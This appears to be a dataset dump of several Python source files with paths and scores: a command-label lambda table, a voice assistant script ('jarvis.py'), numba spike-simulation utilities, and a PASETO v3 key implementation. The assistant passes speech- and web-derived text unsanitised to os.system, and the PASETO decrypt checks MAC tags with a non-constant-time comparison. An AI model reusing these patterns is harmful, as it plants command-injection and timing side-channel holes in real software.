lambda r: [lambda s="": [r[0] + ": Oblong"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Box"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Box"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": ["Move"] + [el[0](s) for el in r]],
lambda r: [lambda s="": [r[0] + ": Move"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Move"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Jump"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Pivot Left", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Pivot Left"]],
lambda r: [lambda s="": [r[0] + ": Pivot Right", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Pivot Right"]],
lambda r: [lambda s="": [r[0] + ": Jump to"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate transform"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate transform"]]
] +
[lambda r: [lambda s="": [r[0] + ": Reflect transform"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Rotate prism"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Reflect mirror"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Rotate copy"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Reflect copy"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [
r[0] + ": Rotate overlap overlap"
] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Rotate overlap"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [
r[0] + ": Rotate shutter overlap"
] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Rotate shutter"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [
r[0] + ": Reflect overlap overlap"
] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Reflect overlap"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [
r[0] + ": Reflect butterfly overlap"
] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Reflect butterfly"] + [el[0](s) for el in r[1:]]]] * 3 +
[
lambda r: [lambda s="": [r[0] + ": Rotate"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate"]],
lambda r: [lambda s="": [r[0] + ": Reflect"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Reflect"]],
lambda r: [lambda s="": [r[0] + ": Copy"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": For (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": While (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] +[el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": If", r[1][0](s)] + [el[0](s)[0](s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": If", r[1][0](s)] + [el[0](s)[0](s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Assign at index"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Assign", r[1][0](s)] + [el(t) for el in r[2:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Assign"] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Fill"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": SetBackground", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Dump"]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Refresh for (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Refresh while (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Refresh", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Refresh"]],
lambda r: [lambda s="": [r[0] + ": Toggle trim"]],
lambda r: [lambda s="": [r[0] + ": Crop", r[1][0](s), r[2][0](s)]],
lambda r: [lambda s="": [r[0] + ": Crop", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Clear"]],
lambda r: [lambda s="": [r[0] + ": Extend", r[1][0](s), r[2][0](s)]],
lambda r: [lambda s="": [r[0] + ": Extend", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Push"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": [r[0] + ": Execute variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Execute variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Map assign left", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign right", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": exec"] + [el[0](s) for el in r[1:]]]
]
} | 0.451085 | 0.531331 |
from gtts import gTTS
import speech_recognition as sr
import os
import re
import webbrowser
import smtplib
import requests
from weather import Weather
def talkToMe(audio):
"""speaks audio passed as argument"""
print(audio)
for _ in audio.splitlines():
os.system("echo " + audio)
# use the system's inbuilt say command instead of mpg123
text_to_speech = gTTS(text=audio, lang='en')
text_to_speech.save('audio.mp3')
os.system('start audio.mp3')
def myCommand():
"""listens for commands"""
r = sr.Recognizer()
with sr.Microphone() as source:
print('Ready...')
r.pause_threshold = 1
r.adjust_for_ambient_noise(source, duration=1)
audio = r.listen(source)
try:
command = r.recognize_google(audio).lower()
print('You said: ' + command + '\n')
# loop back to continue to listen for commands if unrecognizable speech is received
except sr.UnknownValueError:
print('Your last command couldn\'t be heard')
command = myCommand()
return command
def assistant(command):
"""if statements for executing commands"""
if 'open reddit' in command:
reg_ex = re.search('open reddit (.*)', command)
url = 'https://www.reddit.com/'
if reg_ex:
subreddit = reg_ex.group(1)
url = url + 'r/' + subreddit
webbrowser.open(url)
print('Done!')
elif 'open website' in command:
reg_ex = re.search('open website (.+)', command)
if reg_ex:
domain = reg_ex.group(1)
url = 'https://www.' + domain
webbrowser.open(url)
print('Done!')
else:
pass
elif 'what\'s up' in command:
talkToMe('Just doing my thing')
elif 'joke' in command:
res = requests.get(
'https://icanhazdadjoke.com/',
headers={"Accept": "application/json"}
)
if res.status_code == requests.codes.ok:
talkToMe(str(res.json()['joke']))
else:
talkToMe('oops!I ran out of jokes')
elif 'current weather in' in command:
reg_ex = re.search('current weather in (.*)', command)
if reg_ex:
city = reg_ex.group(1)
weather = Weather()
location = weather.lookup_by_location(city)
condition = location.condition()
talkToMe('The Current weather in %s is %s The tempeture is %.1f degree' % (
city, condition.text(), (int(condition.temp()) - 32) / 1.8))
elif 'weather forecast in' in command:
reg_ex = re.search('weather forecast in (.*)', command)
if reg_ex:
city = reg_ex.group(1)
weather = Weather()
location = weather.lookup_by_location(city)
forecasts = location.forecast()
for i in range(0, 3):
talkToMe('On %s will it %s. The maximum temperture will be %.1f degree.'
'The lowest temperature will be %.1f degrees.' % (
forecasts[i].date(), forecasts[i].text(), (int(forecasts[i].high()) - 32) / 1.8,
(int(forecasts[i].low()) - 32) / 1.8))
elif 'email' in command:
talkToMe('Who is the recipient?')
recipient = myCommand()
if 'Jarvis' in recipient:
talkToMe('What should I say?')
content = myCommand()
# init gmail SMTP
mail = smtplib.SMTP('smtp.gmail.com', 587)
# identify to server
mail.ehlo()
# encrypt session
mail.starttls()
# login
mail.login('username', 'password')
# send message
mail.sendmail('<NAME>', '<EMAIL>', content)
# end mail connection
mail.close()
talkToMe('Email sent.')
else:
talkToMe('I don\'t know what you mean!')
talkToMe('I am ready for your command')
# loop to continue executing multiple commands
while True:
assistant(myCommand()) | jarvis.py | from gtts import gTTS
import speech_recognition as sr
import os
import re
import webbrowser
import smtplib
import requests
from weather import Weather
def talkToMe(audio):
"""speaks audio passed as argument"""
print(audio)
for _ in audio.splitlines():
os.system("echo " + audio)
# use the system's inbuilt say command instead of mpg123
text_to_speech = gTTS(text=audio, lang='en')
text_to_speech.save('audio.mp3')
os.system('start audio.mp3')
def myCommand():
"""listens for commands"""
r = sr.Recognizer()
with sr.Microphone() as source:
print('Ready...')
r.pause_threshold = 1
r.adjust_for_ambient_noise(source, duration=1)
audio = r.listen(source)
try:
command = r.recognize_google(audio).lower()
print('You said: ' + command + '\n')
# loop back to continue to listen for commands if unrecognizable speech is received
except sr.UnknownValueError:
print('Your last command couldn\'t be heard')
command = myCommand()
return command
def assistant(command):
"""if statements for executing commands"""
if 'open reddit' in command:
reg_ex = re.search('open reddit (.*)', command)
url = 'https://www.reddit.com/'
if reg_ex:
subreddit = reg_ex.group(1)
url = url + 'r/' + subreddit
webbrowser.open(url)
print('Done!')
elif 'open website' in command:
reg_ex = re.search('open website (.+)', command)
if reg_ex:
domain = reg_ex.group(1)
url = 'https://www.' + domain
webbrowser.open(url)
print('Done!')
else:
pass
elif 'what\'s up' in command:
talkToMe('Just doing my thing')
elif 'joke' in command:
res = requests.get(
'https://icanhazdadjoke.com/',
headers={"Accept": "application/json"}
)
if res.status_code == requests.codes.ok:
talkToMe(str(res.json()['joke']))
else:
talkToMe('oops!I ran out of jokes')
elif 'current weather in' in command:
reg_ex = re.search('current weather in (.*)', command)
if reg_ex:
city = reg_ex.group(1)
weather = Weather()
location = weather.lookup_by_location(city)
condition = location.condition()
talkToMe('The Current weather in %s is %s The tempeture is %.1f degree' % (
city, condition.text(), (int(condition.temp()) - 32) / 1.8))
elif 'weather forecast in' in command:
reg_ex = re.search('weather forecast in (.*)', command)
if reg_ex:
city = reg_ex.group(1)
weather = Weather()
location = weather.lookup_by_location(city)
forecasts = location.forecast()
for i in range(0, 3):
talkToMe('On %s will it %s. The maximum temperture will be %.1f degree.'
'The lowest temperature will be %.1f degrees.' % (
forecasts[i].date(), forecasts[i].text(), (int(forecasts[i].high()) - 32) / 1.8,
(int(forecasts[i].low()) - 32) / 1.8))
elif 'email' in command:
talkToMe('Who is the recipient?')
recipient = myCommand()
if 'Jarvis' in recipient:
talkToMe('What should I say?')
content = myCommand()
# init gmail SMTP
mail = smtplib.SMTP('smtp.gmail.com', 587)
# identify to server
mail.ehlo()
# encrypt session
mail.starttls()
# login
mail.login('username', 'password')
# send message
mail.sendmail('<NAME>', '<EMAIL>', content)
# end mail connection
mail.close()
talkToMe('Email sent.')
else:
talkToMe('I don\'t know what you mean!')
talkToMe('I am ready for your command')
# loop to continue executing multiple commands
while True:
assistant(myCommand()) | 0.234056 | 0.076408 |
import numpy as np
from numba import jit
from numba.extending import overload
def moving_average(x, w):
print("moving_av")
return np.convolve(x, np.ones(w), "valid") / w
@jit(nopython=True)
def calculate_age(array):
ret = np.zeros(array.shape)
for i in range(array.shape[0]):
count = 0
for j in range(array.shape[1]):
count += 1
if array[i, j]:
count = 0
ret[i, j] = 0
continue
ret[i, j] = count
return ret
calculate_age(np.array([[0]]))
@jit(nopython=True)
def replace_NaN(array):
prev_value = np.zeros(array.shape[1])
for i in range(len(array)):
if np.isnan(array[i, 0]):
array[i] = prev_value
else:
prev_value = array[i]
return array
def calculate_mt(M, spikes):
m_t = np.copy(M)
mask = spikes == 0
m_t[mask] = np.NaN
m_t = np.nanmean(m_t, axis=1)
m_t = replace_NaN(m_t)
return m_t
def calculate_nt(m_t):
return np.einsum("ai,aj->aij", m_t, m_t)
calculate_mt(np.zeros((10, 5, 2)), np.zeros((10, 5)))
@jit(nopython=True, nogil=True)
def f_SRM(x, c=1, Delta=1, theta=0):
return np.exp(x / Delta) * c
@jit(nopython=True)
def eta_SRM(x, Gamma, Lambda, tau=1):
ret = np.zeros(len(x))
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def eta_SRM_no_vector(x, Gamma, Lambda, tau=1):
ret = 0
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def kappa_interaction(t, lambda_kappa, strength):
return strength * np.exp(-lambda_kappa * t)
def h_exp_update(h_t, A_t, I_ext, lambda_kappa, dt, J):
return h_t + lambda_kappa * dt * (J * A_t + I_ext - h_t)
def h_erlang_update(h_t, k_t, A_t, I_ext, lambda_kappa, dt, J):
h = h_t + dt * lambda_kappa * (-h_t + k_t)
k = k_t + dt * lambda_kappa * (-k_t + J * A_t + I_ext)
return h, k
@overload(np.clip)
def np_clip(a, a_min, a_max, out=None):
def np_clip_impl(a, a_min, a_max, out=None):
if out is None:
out = np.empty_like(a)
for i in range(len(a)):
if a[i] < a_min:
out[i] = a_min
elif a[i] > a_max:
out[i] = a_max
else:
out[i] = a[i]
return out
return np_clip_impl | src/flowrect/simulations/util.py | import numpy as np
from numba import jit
from numba.extending import overload
def moving_average(x, w):
print("moving_av")
return np.convolve(x, np.ones(w), "valid") / w
@jit(nopython=True)
def calculate_age(array):
ret = np.zeros(array.shape)
for i in range(array.shape[0]):
count = 0
for j in range(array.shape[1]):
count += 1
if array[i, j]:
count = 0
ret[i, j] = 0
continue
ret[i, j] = count
return ret
calculate_age(np.array([[0]]))
@jit(nopython=True)
def replace_NaN(array):
prev_value = np.zeros(array.shape[1])
for i in range(len(array)):
if np.isnan(array[i, 0]):
array[i] = prev_value
else:
prev_value = array[i]
return array
def calculate_mt(M, spikes):
m_t = np.copy(M)
mask = spikes == 0
m_t[mask] = np.NaN
m_t = np.nanmean(m_t, axis=1)
m_t = replace_NaN(m_t)
return m_t
def calculate_nt(m_t):
return np.einsum("ai,aj->aij", m_t, m_t)
calculate_mt(np.zeros((10, 5, 2)), np.zeros((10, 5)))
@jit(nopython=True, nogil=True)
def f_SRM(x, c=1, Delta=1, theta=0):
return np.exp(x / Delta) * c
@jit(nopython=True)
def eta_SRM(x, Gamma, Lambda, tau=1):
ret = np.zeros(len(x))
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def eta_SRM_no_vector(x, Gamma, Lambda, tau=1):
ret = 0
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def kappa_interaction(t, lambda_kappa, strength):
return strength * np.exp(-lambda_kappa * t)
def h_exp_update(h_t, A_t, I_ext, lambda_kappa, dt, J):
return h_t + lambda_kappa * dt * (J * A_t + I_ext - h_t)
def h_erlang_update(h_t, k_t, A_t, I_ext, lambda_kappa, dt, J):
h = h_t + dt * lambda_kappa * (-h_t + k_t)
k = k_t + dt * lambda_kappa * (-k_t + J * A_t + I_ext)
return h, k
@overload(np.clip)
def np_clip(a, a_min, a_max, out=None):
def np_clip_impl(a, a_min, a_max, out=None):
if out is None:
out = np.empty_like(a)
for i in range(len(a)):
if a[i] < a_min:
out[i] = a_min
elif a[i] > a_max:
out[i] = a_max
else:
out[i] = a[i]
return out
return np_clip_impl | 0.270962 | 0.563918 |
import hashlib
import hmac
from secrets import token_bytes
from typing import Any, Union
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.asymmetric.ec import (
EllipticCurvePrivateKey,
EllipticCurvePublicKey,
)
from cryptography.hazmat.primitives.asymmetric.utils import (
decode_dss_signature,
encode_dss_signature,
)
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from ..exceptions import DecryptError, SignError, VerifyError
from ..key_interface import KeyInterface
from ..key_nist import NISTKey
from ..utils import (
base64url_decode,
base64url_encode,
ec_public_key_compress,
i2osp,
os2ip,
pae,
)
class V3Local(NISTKey):
"""
The key object for v3.local.
"""
_VERSION = 3
_TYPE = "local"
def __init__(self, key: Union[str, bytes]):
super().__init__(key)
return
def encrypt(
self,
payload: bytes,
footer: bytes = b"",
implicit_assertion: bytes = b"",
nonce: bytes = b"",
) -> bytes:
if nonce:
if len(nonce) != 32:
raise ValueError("nonce must be 32 bytes long.")
else:
nonce = token_bytes(32)
e = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-encryption-key" + nonce,
)
a = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-auth-key-for-aead" + nonce,
)
try:
tmp = e.derive(self._key)
ek = tmp[0:32]
n2 = tmp[32:]
ak = a.derive(self._key)
except Exception as err:
raise DecryptError("Failed to derive keys.") from err
c = self._encrypt(ek, n2, payload)
pre_auth = pae([self.header, nonce, c, footer, implicit_assertion])
t = hmac.new(ak, pre_auth, hashlib.sha384).digest()
token = self._header + base64url_encode(nonce + c + t)
if footer:
token += b"." + base64url_encode(footer)
return token
def decrypt(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b"") -> bytes:
n = payload[0:32]
c = payload[32 : len(payload) - 48]
t = payload[-48:]
e = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-encryption-key" + n,
)
a = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-auth-key-for-aead" + n,
)
try:
tmp = e.derive(self._key)
ek = tmp[0:32]
n2 = tmp[32:]
ak = a.derive(self._key)
except Exception as err:
raise DecryptError("Failed to derive keys.") from err
pre_auth = pae([self.header, n, c, footer, implicit_assertion])
t2 = hmac.new(ak, pre_auth, hashlib.sha384).digest()
if t != t2:
raise DecryptError("Failed to decrypt.")
return self._decrypt(ek, n2, c)
def to_paserk_id(self) -> str:
h = "k3.lid."
p = self.to_paserk()
digest = hashes.Hash(hashes.SHA384())
digest.update((h + p).encode("utf-8"))
d = digest.finalize()
return h + base64url_encode(d[0:33]).decode("utf-8")
class V3Public(NISTKey):
"""
The key object for v3.public.
"""
_VERSION = 3
_TYPE = "public"
def __init__(self, key: Any):
super().__init__(key)
self._sig_size = 96
if not isinstance(self._key, (EllipticCurvePublicKey, EllipticCurvePrivateKey)):
raise ValueError("The key is not ECDSA key.")
if isinstance(self._key, EllipticCurvePublicKey):
self._is_secret = False
return
@classmethod
def from_public_bytes(cls, key: bytes):
try:
k = EllipticCurvePublicKey.from_encoded_point(ec.SECP384R1(), key)
except Exception as err:
raise ValueError("Invalid bytes for the key.") from err
return cls(k)
@classmethod
def from_paserk(
cls,
paserk: str,
wrapping_key: bytes = b"",
password: bytes = b"",
unsealing_key: bytes = b"",
) -> KeyInterface:
if wrapping_key and password:
raise ValueError("Only one of wrapping_key or password should be specified.")
frags = paserk.split(".")
if frags[0] != "k3":
raise ValueError(f"Invalid PASERK version: {frags[0]}.")
if wrapping_key:
# secret-wrap
if len(frags) != 4:
raise ValueError("Invalid PASERK format.")
if frags[2] != "pie":
raise ValueError(f"Unknown wrapping algorithm: {frags[2]}.")
if frags[1] == "secret-wrap":
h = "k3.secret-wrap.pie."
k = cls._decode_pie(h, wrapping_key, frags[3])
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
if len(frags) != 3:
raise ValueError("Invalid PASERK format.")
if password:
# secret-pw
if frags[1] == "secret-pw":
h = "k3.secret-pw."
k = cls._decode_pbkw(h, password, frags[2])
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
# public
k = base64url_decode(frags[2])
if frags[1] == "public":
pub = EllipticCurvePublicKey.from_encoded_point(ec.SECP384R1(), k)
return cls(pub)
# secret
if frags[1] == "secret":
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
if frags[1] == "secret-wrap":
raise ValueError(f"{frags[1]} needs wrapping_key.")
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
def to_paserk(
self,
wrapping_key: Union[bytes, str] = b"",
password: Union[bytes, str] = b"",
sealing_key: Union[bytes, str] = b"",
iteration: int = 100000,
memory_cost: int = 15 * 1024,
time_cost: int = 2,
parallelism: int = 1,
) -> str:
if wrapping_key and password:
raise ValueError("Only one of wrapping_key or password should be specified.")
if wrapping_key:
# secret-wrap
if not isinstance(self._key, EllipticCurvePrivateKey):
raise ValueError("Public key cannot be wrapped.")
bkey = wrapping_key if isinstance(wrapping_key, bytes) else wrapping_key.encode("utf-8")
h = "k3.secret-wrap.pie."
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return h + self._encode_pie(h, bkey, k)
if password:
# secret-pw
if not isinstance(self._key, EllipticCurvePrivateKey):
raise ValueError("Public key cannot be wrapped.")
bpw = password if isinstance(password, bytes) else password.encode("utf-8")
h = "k3.secret-pw."
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return h + self._encode_pbkw(h, bpw, k, iteration)
# public
if isinstance(self._key, EllipticCurvePublicKey):
k = ec_public_key_compress(self._key.public_numbers().x, self._key.public_numbers().y)
return "k3.public." + base64url_encode(k).decode("utf-8")
# private
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return "k3.secret." + base64url_encode(k).decode("utf-8")
def to_paserk_id(self) -> str:
p = self.to_paserk()
h = "k3.pid." if isinstance(self._key, EllipticCurvePublicKey) else "k3.sid."
digest = hashes.Hash(hashes.SHA384())
digest.update((h + p).encode("utf-8"))
d = digest.finalize()
return h + base64url_encode(d[0:33]).decode("utf-8")
def sign(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b"") -> bytes:
if isinstance(self._key, EllipticCurvePublicKey):
raise ValueError("A public key cannot be used for signing.")
pk = ec_public_key_compress(
self._key.private_numbers().public_numbers.x,
self._key.private_numbers().public_numbers.y,
)
m2 = pae([pk, self.header, payload, footer, implicit_assertion])
try:
sig = self._key.sign(m2, ec.ECDSA(hashes.SHA384()))
return self._der_to_os(self._key.curve.key_size, sig)
except Exception as err:
raise SignError("Failed to sign.") from err
def verify(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b""):
if len(payload) <= self._sig_size:
raise ValueError("Invalid payload.")
sig = payload[-self._sig_size :]
m = payload[: len(payload) - self._sig_size]
k = self._key if isinstance(self._key, EllipticCurvePublicKey) else self._key.public_key()
pk = ec_public_key_compress(k.public_numbers().x, k.public_numbers().y)
m2 = pae([pk, self.header, m, footer, implicit_assertion])
try:
der_sig = self._os_to_der(self._key.curve.key_size, sig)
k.verify(der_sig, m2, ec.ECDSA(hashes.SHA384()))
except Exception as err:
raise VerifyError("Failed to verify.") from err
return m
def _der_to_os(self, key_size: int, sig: bytes) -> bytes:
num_bytes = (key_size + 7) // 8
r, s = decode_dss_signature(sig)
return i2osp(r, num_bytes) + i2osp(s, num_bytes)
def _os_to_der(self, key_size: int, sig: bytes) -> bytes:
num_bytes = (key_size + 7) // 8
if len(sig) != 2 * num_bytes:
raise ValueError("Invalid signature.")
r = os2ip(sig[:num_bytes])
s = os2ip(sig[num_bytes:])
return encode_dss_signature(r, s) | pyseto/versions/v3.py | import hashlib
import hmac
from secrets import token_bytes
from typing import Any, Union
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.asymmetric.ec import (
EllipticCurvePrivateKey,
EllipticCurvePublicKey,
)
from cryptography.hazmat.primitives.asymmetric.utils import (
decode_dss_signature,
encode_dss_signature,
)
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from ..exceptions import DecryptError, SignError, VerifyError
from ..key_interface import KeyInterface
from ..key_nist import NISTKey
from ..utils import (
base64url_decode,
base64url_encode,
ec_public_key_compress,
i2osp,
os2ip,
pae,
)
class V3Local(NISTKey):
"""
The key object for v3.local.
"""
_VERSION = 3
_TYPE = "local"
def __init__(self, key: Union[str, bytes]):
super().__init__(key)
return
def encrypt(
self,
payload: bytes,
footer: bytes = b"",
implicit_assertion: bytes = b"",
nonce: bytes = b"",
) -> bytes:
if nonce:
if len(nonce) != 32:
raise ValueError("nonce must be 32 bytes long.")
else:
nonce = token_bytes(32)
e = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-encryption-key" + nonce,
)
a = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-auth-key-for-aead" + nonce,
)
try:
tmp = e.derive(self._key)
ek = tmp[0:32]
n2 = tmp[32:]
ak = a.derive(self._key)
except Exception as err:
raise DecryptError("Failed to derive keys.") from err
c = self._encrypt(ek, n2, payload)
pre_auth = pae([self.header, nonce, c, footer, implicit_assertion])
t = hmac.new(ak, pre_auth, hashlib.sha384).digest()
token = self._header + base64url_encode(nonce + c + t)
if footer:
token += b"." + base64url_encode(footer)
return token
def decrypt(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b"") -> bytes:
n = payload[0:32]
c = payload[32 : len(payload) - 48]
t = payload[-48:]
e = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-encryption-key" + n,
)
a = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-auth-key-for-aead" + n,
)
try:
tmp = e.derive(self._key)
ek = tmp[0:32]
n2 = tmp[32:]
ak = a.derive(self._key)
except Exception as err:
raise DecryptError("Failed to derive keys.") from err
pre_auth = pae([self.header, n, c, footer, implicit_assertion])
t2 = hmac.new(ak, pre_auth, hashlib.sha384).digest()
if t != t2:
raise DecryptError("Failed to decrypt.")
return self._decrypt(ek, n2, c)
def to_paserk_id(self) -> str:
h = "k3.lid."
p = self.to_paserk()
digest = hashes.Hash(hashes.SHA384())
digest.update((h + p).encode("utf-8"))
d = digest.finalize()
return h + base64url_encode(d[0:33]).decode("utf-8")
class V3Public(NISTKey):
"""
The key object for v3.public.
"""
_VERSION = 3
_TYPE = "public"
def __init__(self, key: Any):
super().__init__(key)
self._sig_size = 96
if not isinstance(self._key, (EllipticCurvePublicKey, EllipticCurvePrivateKey)):
raise ValueError("The key is not ECDSA key.")
if isinstance(self._key, EllipticCurvePublicKey):
self._is_secret = False
return
@classmethod
def from_public_bytes(cls, key: bytes):
try:
k = EllipticCurvePublicKey.from_encoded_point(ec.SECP384R1(), key)
except Exception as err:
raise ValueError("Invalid bytes for the key.") from err
return cls(k)
@classmethod
def from_paserk(
cls,
paserk: str,
wrapping_key: bytes = b"",
password: bytes = b"",
unsealing_key: bytes = b"",
) -> KeyInterface:
if wrapping_key and password:
raise ValueError("Only one of wrapping_key or password should be specified.")
frags = paserk.split(".")
if frags[0] != "k3":
raise ValueError(f"Invalid PASERK version: {frags[0]}.")
if wrapping_key:
# secret-wrap
if len(frags) != 4:
raise ValueError("Invalid PASERK format.")
if frags[2] != "pie":
raise ValueError(f"Unknown wrapping algorithm: {frags[2]}.")
if frags[1] == "secret-wrap":
h = "k3.secret-wrap.pie."
k = cls._decode_pie(h, wrapping_key, frags[3])
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
if len(frags) != 3:
raise ValueError("Invalid PASERK format.")
if password:
# secret-pw
if frags[1] == "secret-pw":
h = "k3.secret-pw."
k = cls._decode_pbkw(h, password, frags[2])
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
# public
k = base64url_decode(frags[2])
if frags[1] == "public":
pub = EllipticCurvePublicKey.from_encoded_point(ec.SECP384R1(), k)
return cls(pub)
# secret
if frags[1] == "secret":
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
if frags[1] == "secret-wrap":
raise ValueError(f"{frags[1]} needs wrapping_key.")
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
def to_paserk(
self,
wrapping_key: Union[bytes, str] = b"",
password: Union[bytes, str] = b"",
